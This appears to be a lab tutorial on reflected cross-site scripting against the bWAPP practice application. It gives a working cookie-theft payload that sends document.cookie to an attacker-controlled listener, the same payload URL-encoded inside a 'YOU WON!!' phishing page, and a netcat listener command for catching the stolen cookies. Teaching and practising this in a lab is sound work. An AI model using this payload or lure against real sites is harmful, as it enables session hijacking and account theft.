Reflected XSS is the most common type of XSS. It occurs when the malicious payload is part of the request that the victim’s browser sends to the vulnerable site.
This type of attack is called “reflected” because an input field of the HTTP request sent by the browser, is immediately repeated on the output page.
The attacker uses Phishing emails and other social engineering techniques to convince the victim to open the malicious link.
Reflected XSS isn’t a persistent attack, so the attacker needs to deliver the payload to each victim.
For this tutorial we’ll use bWAPP vulnerable application.
Start the bee-box and verify the IP address (open the terminal and type “ifconfig”), in my case 192.168.1.15. Now open your browser and connect to bee-box address. Login in and choose Cross-Site Scripting – Reflected (GET)
CHECK IF IT IS VULNERABLE
To test if the input fields are vulnerable, we try to inject this script:
If it is vulnerable, it will show us an alert box that says: XSS.
Since both fields are required insert the script in First name field and in Last name field we can insert what we want… How you can see, it show us an alert box, this means that it is vulnerable. If you try to insert the script in Last name field, you can see that it is vulnerable too.
Google Chrome uses an Anti-XSS filter, i suggest to use FireFox for this test.
Now we will see how un attacker can steal the cookie with this type of vulnerability.
For this test i created a simply HTML page, with the malicious link. In a real case the attacker can send this link via mail or through a social network and can hide the link by using an URL shortener like bit.ly.
In this page we’ll insert a script that will send the cookie to the attacker. This is the script:
<script>new Image().src="http://192.168.1.19/cookie.php?c="+ document.cookie;</script>
The image tag is being pointed to my attacking listener at a URL of the user’s cookie. Of course this URL doesn’t exist on my attacking site, but I simply want to capture the request.
Now we need to encode the script, you can do this on this site: freeformatter. This is the encoded script:
This is the HTML page:
<h1 align="center">YOU WON!!</h1>
Click this <a href="http://192.168.1.15/bWAPP/xss_get.php?firstname=%3Cscript%3Enew+Image%28%29.src%3D%22http%3A%2F%2F192.168.1.19%2Fcookie.php%3Fc%3D%22%2B+document.cookie%3B%3C%2Fscript%3E&lastname=test&form=submit">link</a> to see your prize
Now we can send this file to the victim and setup a Netcat listener to receive the webpage visitor’s session ID cookie. In Kali Linux open the terminal and insert:
nc -lvp 80
We launch Netcat with these options:
- l: listener mode
- v: verbose
- p: listen on port 80
When the victim open this link in an authenticated session, we receive his cookie